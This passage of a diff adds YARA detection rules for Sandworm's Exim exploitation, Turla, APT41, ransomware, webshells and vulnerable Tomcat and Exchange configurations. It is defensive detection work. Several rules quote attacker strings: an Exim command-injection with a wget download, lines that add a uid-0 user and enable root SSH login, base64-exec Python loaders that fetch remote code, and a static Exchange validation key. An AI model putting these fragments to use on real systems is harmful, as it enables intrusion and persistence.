+      $op2 = { 8d 45 bc 50 53 53 6a 1c 8d 85 10 ff ff ff 50 ff } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) or 2 of them
+}
+
+rule SUSP_Reversed_Hacktool_Author_RID3261 : DEMO HKTL SUSP {
+   meta:
+      description = "Detects a suspicious path traversal into a Windows folder"
+      author = "Florian Roth"
+      reference = "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/"
+      date = "2020-06-10 14:02:41"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      type = "file"
+      tags = "DEMO, HKTL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "iwiklitneg" fullword ascii wide
+      $x2 = " eetbus@ " ascii wide
+   condition: 
+      filesize < 4000KB and 1 of them
+}
+
+rule SUSP_Base64_Encoded_Hacktool_Dev_RID32C3 : DEMO HKTL SUSP T1132 {
+   meta:
+      description = "Detects a suspicious base64 encoded keyword"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyb3rops/status/1270626274826911744"
+      date = "2020-06-10 14:19:01"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SUSP, T1132"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = "QGdlbnRpbGtpd2" ascii wide
+      $ = "BnZW50aWxraXdp" ascii wide
+      $ = "AZ2VudGlsa2l3a" ascii wide
+      $ = "QGhhcm1qMH" ascii wide
+      $ = "BoYXJtajB5" ascii wide
+      $ = "AaGFybWowe" ascii wide
+      $ = "IEBzdWJ0ZW" ascii wide
+      $ = "BAc3VidGVl" ascii wide
+      $ = "gQHN1YnRlZ" ascii wide
+   condition: 
+      filesize < 6000KB and 1 of them
+}
+
+rule SUSP_Script_Base64_Blocks_Jun20_1_RID32AF : DEMO SCRIPT SUSP T1132 {
+   meta:
+      description = "Detects suspicious file with base64 encoded payload in blocks"
+      author = "Florian Roth"
+      reference = "https://posts.specterops.io/covenant-v0-5-eee0507b85ba"
+      date = "2020-06-05 14:15:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, SUSP, T1132"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sa1 = "<script language=" ascii
+      $sb2 = { 41 41 41 22 2B 0D 0A 22 41 41 41 } 
+   condition: 
+      all of them
+}
+
+rule SUSP_Recon_Outputs_Jun20_1_RID3093 : DEMO SUSP {
+   meta:
+      description = "Detects outputs of many different commands often used for reconnaissance purposes"
+      author = "Florian Roth"
+      reference = "https://securelist.com/cycldek-bridging-the-air-gap/97157/"
+      date = "2020-06-04 12:45:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ". . . . : Yes" ascii
+      $s2 = "with 32 bytes of data:" ascii
+      $s3 = "ff-ff-ff-ff-ff-ff     static" ascii
+      $s4 = "  TCP    0.0.0.0:445" ascii
+      $s5 = "System Idle Process" ascii
+   condition: 
+      filesize < 150KB and 4 of them
+}
+
+rule APT_MAL_RU_Turla_Kazuar_May20_1_RID31E1 : APT DEMO EXE FILE G0010 MAL RUSSIA {
+   meta:
+      description = "Detects Turla Kazuar malware"
+      author = "Florian Roth"
+      reference = "https://www.epicturla.com/blog/sysinturla"
+      date = "2020-05-28 13:41:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1749c96cc1a4beb9ad4d6e037e40902fac31042fa40152f1d3794f49ed1a2b5c"
+      hash2 = "1fca5f41211c800830c5f5c3e355d31a05e4c702401a61f11e25387e25eeb7fa"
+      hash3 = "2d8151dabf891cf743e67c6f9765ee79884d024b10d265119873b0967a09b20f"
+      tags = "APT, DEMO, EXE, FILE, G0010, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Sysinternals" ascii fullword
+      $s2 = "Test Copyright" wide fullword
+      $op1 = { 0d 01 00 08 34 2e 38 30 2e 30 2e 30 00 00 13 01 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+}
+
+rule APT_Sandworm_Keywords_May20_1_RID31CF : APT CVE_2019_10149 DEMO EXPLOIT {
+   meta:
+      description = "Detects commands used by Sandworm group to exploit critical vulernability CVE-2019-10149 in Exim"
+      author = "Florian Roth"
+      reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+      date = "2020-05-28 13:38:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CVE_2019_10149, DEMO, EXPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "MAIL FROM:<$(run(" 
+      $x2 = "exec\\x20\\x2Fusr\\x2Fbin\\x2Fwget\\x20\\x2DO\\x20\\x2D\\x20http" 
+   condition: 
+      filesize < 8000KB and 1 of them
+}
+
+rule APT_Sandworm_SSH_Key_May20_1_RID30ED : APT DEMO T1021 {
+   meta:
+      description = "Detects SSH key used by Sandworm on exploited machines"
+      author = "Florian Roth"
+      reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+      date = "2020-05-28 13:00:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+      hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+      tags = "APT, DEMO, T1021"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2q/NGN/brzNfJiIp2zswtL33tr74pIAjMeWtXN1p5Hqp5fTp058U1EN4NmgmjX0KzNjjV" 
+   condition: 
+      filesize < 1000KB and 1 of them
+}
+
+rule APT_Sandworm_SSHD_Config_Modification_May20_1_RID3793 : APT DEMO T1021 {
+   meta:
+      description = "Detects ssh config entry inserted by Sandworm on compromised machines"
+      author = "Florian Roth"
+      reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+      date = "2020-05-28 17:44:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+      hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+      tags = "APT, DEMO, T1021"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "AllowUsers mysql_db" ascii
+      $a1 = "ListenAddress" ascii fullword
+   condition: 
+      filesize < 10KB and all of them
+}
+
+rule APT_Sandworm_InitFile_May20_1_RID318B : APT DEMO SCRIPT {
+   meta:
+      description = "Detects mysql init script used by Sandworm on compromised machines"
+      author = "Florian Roth"
+      reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+      date = "2020-05-28 13:27:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+      hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "GRANT ALL PRIVILEGES ON * . * TO 'mysqldb'@'localhost';" ascii
+      $s2 = "CREATE USER 'mysqldb'@'localhost' IDENTIFIED BY '" ascii fullword
+   condition: 
+      filesize < 10KB and all of them
+}
+
+rule APT_Sandworm_User_May20_1_RID3016 : APT DEMO {
+   meta:
+      description = "Detects user added by Sandworm on compromised machines"
+      author = "Florian Roth"
+      reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+      date = "2020-05-28 12:24:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+      hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "mysql_db:x:" ascii
+      $a1 = "root:x:" 
+      $a2 = "daemon:x:" 
+   condition: 
+      filesize < 4KB and all of them
+}
+
+rule APT_WEBSHELL_PHP_Sandworm_May20_1_RID3214 : APT DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects GIF header PHP webshell used by Sandworm on compromised machines"
+      author = "Florian Roth"
+      reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+      date = "2020-05-28 13:49:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+      hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+      tags = "APT, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $h1 = "GIF89a <?php $" ascii
+      $s1 = "str_replace(" ascii
+   condition: 
+      filesize < 10KB and $h1 at 0 and $s1
+}
+
+rule APT_SH_Sandworm_Shell_Script_May20_1_RID343D : APT DEMO SCRIPT T1136 T1160 {
+   meta:
+      description = "Detects shell script used by Sandworm in attack against Exim mail server"
+      author = "Florian Roth"
+      reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+      date = "2020-05-28 15:22:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+      hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+      tags = "APT, DEMO, SCRIPT, T1136, T1160"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "echo \"GRANT ALL PRIVILEGES ON * . * TO 'mysqldb'@'localhost';\" >> init-file.txt" ascii fullword
+      $x2 = "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version" ascii fullword
+      $x3 = "sed -i -e '/PasswordAuthentication/s/no/yes/g; /PermitRootLogin/s/no/yes/g;" ascii fullword
+      $x4 = "useradd -M -l -g root -G root -b /root -u 0 -o mysql_db" ascii fullword
+      $s1 = "/ip.php?port=${PORT}\"" ascii fullword
+      $s2 = "sed -i -e '/PasswordAuthentication" ascii fullword
+      $s3 = "PATH_KEY=/root/.ssh/authorized_keys" ascii fullword
+      $s4 = "CREATE USER" ascii fullword
+      $s5 = "crontab -l | { cat; echo" ascii fullword
+      $s6 = "mysqld --user=mysql --init-file=/etc/opt/init-file.txt --console" ascii fullword
+      $s7 = "sshkey.php" ascii fullword
+   condition: 
+      uint16 ( 0 ) == 0x2123 and filesize < 20KB and 1 of ( $x* ) or 4 of them
+}
+
+rule APT_RU_Sandworm_PY_May20_1_RID3026 : APT DEMO RUSSIA SCRIPT T1059_006 {
+   meta:
+      description = "Detects Sandworm Python loader"
+      author = "Florian Roth"
+      reference = "https://twitter.com/billyleonard/status/1266054881225236482"
+      date = "2020-05-28 12:27:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c025008463fdbf44b2f845f2d82702805d931771aea4b506573b83c8f58bccca"
+      tags = "APT, DEMO, RUSSIA, SCRIPT, T1059_006"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "o.addheaders=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko')]" ascii fullword
+      $s1 = "exec(o.open('http://" ascii
+      $s2 = "__import__({2:'urllib2',3:'urllib.request'}" 
+   condition: 
+      uint16 ( 0 ) == 0x6d69 and filesize < 1KB and 1 of ( $x* ) or 2 of them
+}
+
+rule APT_RU_Sandworm_PY_May20_2_RID3027 : APT DEMO FILE RUSSIA SCRIPT T1059_006 {
+   meta:
+      description = "Detects Sandworm Python loader"
+      author = "Florian Roth"
+      reference = "https://twitter.com/billyleonard/status/1266054881225236482"
+      date = "2020-05-28 12:27:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "abfa83cf54db8fa548942acd845b4f34acc94c46d4e1fb5ce7e97cc0c6596676"
+      tags = "APT, DEMO, FILE, RUSSIA, SCRIPT, T1059_006"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "import sys;import re, subprocess;cmd" ascii fullword
+      $x2 = "UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http" 
+      $x3 = "';t='/admin/get.php';req" ascii
+      $x4 = "ps -ef | grep Little\\ Snitch | grep " ascii fullword
+   condition: 
+      uint16 ( 0 ) == 0x6d69 and filesize < 2KB and 1 of them
+}
+
+rule APT_LNX_Academic_Camp_May20_Eraser_1_RID33C6 : APT DEMO FILE LINUX MAL {
+   meta:
+      description = "Detects malware used in attack on academic data centers"
+      author = "Florian Roth"
+      reference = "https://csirt.egi.eu/academic-data-centers-abused-for-crypto-currency-mining/"
+      date = "2020-05-16 15:02:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "552245645cc49087dfbc827d069fa678626b946f4b71cb35fa4a49becd971363"
+      tags = "APT, DEMO, FILE, LINUX, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sc2 = { E6 FF FF 48 89 45 D0 8B 45 E0 BA 00 00 00 00 BE
+               00 00 00 00 89 C7 E8 } 
+      $sc3 = { E6 FF FF 89 45 DC 8B 45 DC 83 C0 01 48 98 BE 01
+               00 00 00 48 89 C7 E8 } 
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 60KB and all of them
+}
+
+rule APT_LNX_Academic_Camp_May20_Loader_1_RID33BB : APT DEMO FILE LINUX MAL {
+   meta:
+      description = "Detects malware used in attack on academic data centers"
+      author = "Florian Roth"
+      reference = "https://csirt.egi.eu/academic-data-centers-abused-for-crypto-currency-mining/"
+      date = "2020-05-16 15:00:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0efdd382872f0ff0866e5f68f0c66c01fcf4f9836a78ddaa5bbb349f20353897"
+      tags = "APT, DEMO, FILE, LINUX, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sc1 = { C6 45 F1 00 C6 45 F2 0A C6 45 F3 0A C6 45 F4 4A
+               C6 45 F5 04 C6 45 F6 06 C6 45 F7 1B C6 45 F8 01 } 
+      $sc2 = { 01 48 39 EB 75 EA 48 83 C4 08 5B 5D 41 5C 41 5D } 
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 10KB and all of them
+}
+
+rule MAL_RANSOM_Ragna_Locker_Apr20_1_RID3195 : CRIME DEMO EXE MAL RANSOM {
+   meta:
+      description = "Detects Ragna Locker Ransomware"
+      author = "Florian Roth"
+      reference = "https://otx.alienvault.com/indicator/file/c2bd70495630ed8279de0713a010e5e55f3da29323b59ef71401b12942ba52f6"
+      date = "2020-04-27 13:28:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c2bd70495630ed8279de0713a010e5e55f3da29323b59ef71401b12942ba52f6"
+      tags = "CRIME, DEMO, EXE, MAL, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "---RAGNAR SECRET---" ascii
+      $xc1 = { 0D 0A 25 73 0D 0A 0D 0A 25 73 0D 0A 25 73 0D 0A
+               25 73 0D 0A 0D 0A 25 73 0D 0A 00 00 2E 00 72 00
+               61 00 67 00 6E 00 61 00 72 00 5F } 
+      $xc2 = { 00 2D 00 66 00 6F 00 72 00 63 00 65 00 00 00 00
+               00 57 00 69 00 6E 00 53 00 74 00 61 00 30 00 5C
+               00 44 00 65 00 66 00 61 00 75 00 6C 00 74 00 00
+               00 5C 00 6E 00 6F 00 74 00 65 00 70 00 61 00 64
+               00 2E 00 65 00 78 00 65 00 } 
+      $s1 = "bootfont.bin" wide fullword
+      $sc2 = { 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 00
+               00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 2E
+               00 6F 00 6C 00 64 00 00 00 54 00 6F 00 72 00 20
+               00 62 00 72 00 6F 00 77 00 73 00 65 00 72 00 } 
+      $op1 = { c7 85 58 ff ff ff 55 00 6b 00 c7 85 5c ff ff ff } 
+      $op2 = { 50 c7 85 7a ff ff ff 5c } 
+      $op3 = { 8b 75 08 8a 84 0d 20 ff ff ff ff 45 08 32 06 8b } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 4 of them
+}
+
+rule MAL_RANSOM_COVID19_Apr20_1_RID2ECC : CRIME DEMO EXE FILE MAL RANSOM {
+   meta:
+      description = "Detects ransomware distributed in COVID-19 theme"
+      author = "Florian Roth"
+      reference = "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/"
+      date = "2020-04-15 11:29:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326"
+      tags = "CRIME, DEMO, EXE, FILE, MAL, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "/savekey.php" wide
+      $op1 = { 3f ff ff ff ff ff 0b b4 } 
+      $op2 = { 60 2e 2e 2e af 34 34 34 b8 34 34 34 b8 34 34 34 } 
+      $op3 = { 1f 07 1a 37 85 05 05 36 83 05 05 36 83 05 05 34 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and 2 of them
+}
+
+rule APT_APT41_CN_ELF_Speculoos_Backdoor_RID3365 : APT CHINA DEMO G0096 LINUX MAL {
+   meta:
+      description = "Detects Speculoos Backdoor used by APT41"
+      author = "Florian Roth"
+      reference = "https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/"
+      date = "2020-04-14 14:46:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167"
+      hash2 = "99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28"
+      tags = "APT, CHINA, DEMO, G0096, LINUX, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $xc1 = { 2F 70 72 69 76 61 74 65 2F 76 61 72 00 68 77 2E
+               70 68 79 73 6D 65 6D 00 68 77 2E 75 73 65 72 6D
+               65 6D 00 4E 41 2D 4E 41 2D 4E 41 2D 4E 41 2D 4E
+               41 2D 4E 41 00 6C 6F 30 00 00 00 00 25 30 32 78
+               2D 25 30 32 78 2D 25 30 32 78 2D 25 30 32 78 2D
+               25 30 32 78 2D 25 30 32 78 0A 00 72 00 4E 41 00
+               75 6E 61 6D 65 20 2D 76 } 
+      $s1 = "badshell" ascii fullword
+      $s2 = "hw.physmem" ascii fullword
+      $s3 = "uname -v" ascii fullword
+      $s4 = "uname -s" ascii fullword
+      $s5 = "machdep.tsc_freq" ascii fullword
+      $s6 = "/usr/sbin/config.bak" ascii fullword
+      $s7 = "enter MessageLoop..." ascii fullword
+      $s8 = "exit StartCBProcess..." ascii fullword
+      $sc1 = { 72 6D 20 2D 72 66 20 22 25 73 22 00 2F 70 72 6F
+               63 2F } 
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 600KB and 1 of ( $x* ) or 4 of them
+}
+
+rule HKTL_FRP_Apr20_1_RID2BFF : DEMO HKTL T1090 {
+   meta:
+      description = "Detects FRP fast reverse proxy tool often used by threat groups"
+      author = "Florian Roth"
+      reference = "https://github.com/fatedier/frp"
+      date = "2020-04-07 09:30:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-11-03"
+      hash1 = "05537c1c4e29db76a24320fb7cb80b189860389cdb16a9dbeb0c8d30d9b37006"
+      hash2 = "08c685c8febb5385f7548c2a64a27bae7123a937c5af958ebc08a3accb29978d"
+      tags = "DEMO, HKTL, T1090"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "frp/vendor/github.com/spf13/" ascii
+      $x2 = "github.com/fatedier/frp/vendor/" ascii
+      $fpg2 = "<html" 
+      $fpg3 = "<HTML" 
+      $fpg6 = "<?xml" 
+   condition: 
+      1 of ( $x* ) and not 1 of ( $fp* )
+}
+
+rule HKTL_FRP_INI_Apr20_1_RID2D3E : DEMO FILE HKTL T1090 {
+   meta:
+      description = "Detects FRP fast reverse proxy tool INI file often used by threat groups"
+      author = "Florian Roth"
+      reference = "Chinese Hacktools OpenDir"
+      date = "2020-04-07 10:23:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1dabef3c170e4e559c50d603d47fb7f66f6e3da75a65c3435b18175d6e9785bb"
+      tags = "DEMO, FILE, HKTL, T1090"
+      minimum_yara = "1.7"
+      
+   strings:
+      $h1 = "[common]" ascii
+      $s1 = "server_addr =" ascii fullword
+      $s2 = "remote_port =" ascii fullword
+      $s3 = "[RemoteDesktop]" ascii fullword
+      $s4 = "local_ip = " ascii
+      $s5 = "type = tcp" ascii fullword
+   condition: 
+      uint16 ( 0 ) == 0x635b and filesize < 1KB and $h1 at 0 and all of them
+}
+
+rule SUSP_Reversed_Base64_Encoded_EXE_RID3291 : DEMO SUSP T1132 {
+   meta:
+      description = "Detects an base64 encoded executable with reversed characters"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2020-04-06 14:10:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      type = "file"
+      hash1 = "7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8"
+      tags = "DEMO, SUSP, T1132"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "AEAAAAEQATpVT" 
+      $s2 = "AAAAAAAAAAoVT" 
+      $s3 = "AEAAAAEAAAqVT" 
+      $s4 = "AEAAAAIAAQpVT" 
+      $s5 = "AEAAAAMAAQqVT" 
+      $sh1 = "SZk9WbgM1TEBibpBib1JHIlJGI09mbuF2Yg0WYyd2byBHIzlGaU" ascii
+      $sh2 = "LlR2btByUPREIulGIuVncgUmYgQ3bu5WYjBSbhJ3ZvJHcgMXaoR" ascii
+      $sh3 = "uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV" ascii
+   condition: 
+      filesize < 10000KB and 1 of them
+}
+
+rule APT_MAL_LNX_Penquin_Turla_Apr20_1_RID329A : APT DEMO FILE G0010 LINUX MAL RUSSIA {
+   meta:
+      description = "Detects Penquin Turla Linux malware"
+      author = "Florian Roth"
+      reference = "https://twitter.com/IntezerLabs/status/1247131160452509696"
+      date = "2020-04-05 14:12:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502"
+      hash2 = "8ccc081d4940c5d8aa6b782c16ed82528c0885bbb08210a8d0a8c519c54215bc"
+      tags = "APT, DEMO, FILE, G0010, LINUX, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "/root/.hsperfdata" ascii fullword
+      $s2 = "Desc|     Filename     |  size  |state|" ascii fullword
+      $s3 = "IPv6 address %s not supported" ascii fullword
+      $s4 = "File already exist on remote filesystem !" ascii fullword
+      $s5 = "/tmp/.sync.pid" ascii fullword
+      $s6 = "'gateway' supported only on ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel" ascii fullword
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 5000KB and 4 of them
+}
+
+rule SUSP_XORed_URL_in_EXE_RID2E46 : DEMO EXE FILE SUSP {
+   meta:
+      description = "Detects an XORed URL in an executable"
+      author = "Florian Roth"
+      reference = "https://twitter.com/stvemillertime/status/1237035794973560834"
+      date = "2020-03-09 11:07:31"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-02-21"
+      tags = "DEMO, EXE, FILE, SUSP"
+      required_modules = "pe"
+      minimum_yara = "3.8.0"
+      
+   strings:
+      $s1 = "http://" xor
+      $s2 = "https://" xor
+      $f1 = "http://" ascii
+      $f2 = "https://" ascii
+      $fp01 = "3Com Corporation" ascii
+      $fp02 = "bootloader.jar" ascii
+      $fp03 = "AVAST Software" ascii wide
+      $fp04 = "smartsvn" wide ascii fullword
+      $fp05 = "Avira Operations GmbH" wide fullword
+      $fp06 = "Perl Dev Kit" wide fullword
+      $fp07 = "Digiread" wide fullword
+      $fp08 = "Avid Editor" wide fullword
+      $fp09 = "Digisign" wide fullword
+      $fp10 = "Microsoft Corporation" wide fullword
+      $fp11 = "Microsoft Code Signing" ascii wide
+      $fp12 = "XtraProxy" wide fullword
+      $fp13 = "A Sophos Company" wide
+      $fp14 = "http://crl3.digicert.com/" ascii
+      $fp15 = "http://crl.sectigo.com/SectigoRSACodeSigningCA.crl" ascii
+      $fp16 = "HitmanPro.Alert" wide fullword
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and ( ( $s1 and #s1 > #f1 ) or ( $s2 and #s2 > #f2 ) ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
+}
+
+rule VUL_Tomcat_Catalina_CVE_2020_1938_RID31DF : CVE_2020_1938 DEMO EXPLOIT T1210 VULN {
+   meta:
+      description = "Detects a possibly active and vulnerable Tomcat configuration that includes an accessible and unprotected AJP connector (you can ignore backup files or files that are not actively used)"
+      author = "Florian Roth"
+      reference = "https://www.chaitin.cn/en/ghostcat"
+      date = "2020-02-28 13:41:01"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2020_1938, DEMO, EXPLOIT, T1210, VULN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $h1 = "<?xml " 
+      $a1 = "<Service name=\"Catalina\">" ascii
+      $v1 = "<Connector port=\"8009\" protocol=\"AJP/1.3\" redirectPort=\"8443\"/>" ascii
+      $fp1 = "<!--<Connector port=\"8009\" protocol=\"AJP/1.3\" redirectPort=\"8443\"" ascii
+      $fp2 = " secret=\"" ascii
+      $fp3 = " requiredSecret=\"" ascii
+   condition: 
+      $h1 at 0 and filesize <= 300KB and $a1 and $v1 and not 1 of ( $fp* )
+}
+
+rule VUL_Exchange_CVE_2020_0688_RID2F1F : CVE_2020_0688 DEMO EXPLOIT VULN {
+   meta:
+      description = "Detects static validation key used by Exchange server in web.config"
+      author = "Florian Roth"
+      reference = "https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys"
+      date = "2020-02-26 11:43:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2020_0688, DEMO, EXPLOIT, VULN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $h1 = "<?xml " 
+      $x1 = "<machineKey validationKey=\"CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\"" ascii wide
+   condition: 
+      filesize <= 300KB and $h1 at 0 and $x1
+}
+
+rule WEBSHELL_ASPX_XslTransform_Aug21_RID3233 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects an ASPX webshell utilizing XSL Transformations"
+      author = "Max Altgelt"
+      reference = "https://gist.github.com/JohnHammond/cdae03ca5bc2a14a735ad0334dcb93d6"
+      date = "2020-02-23 13:55:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $csharpshell = "Language=\"C#\"" nocase
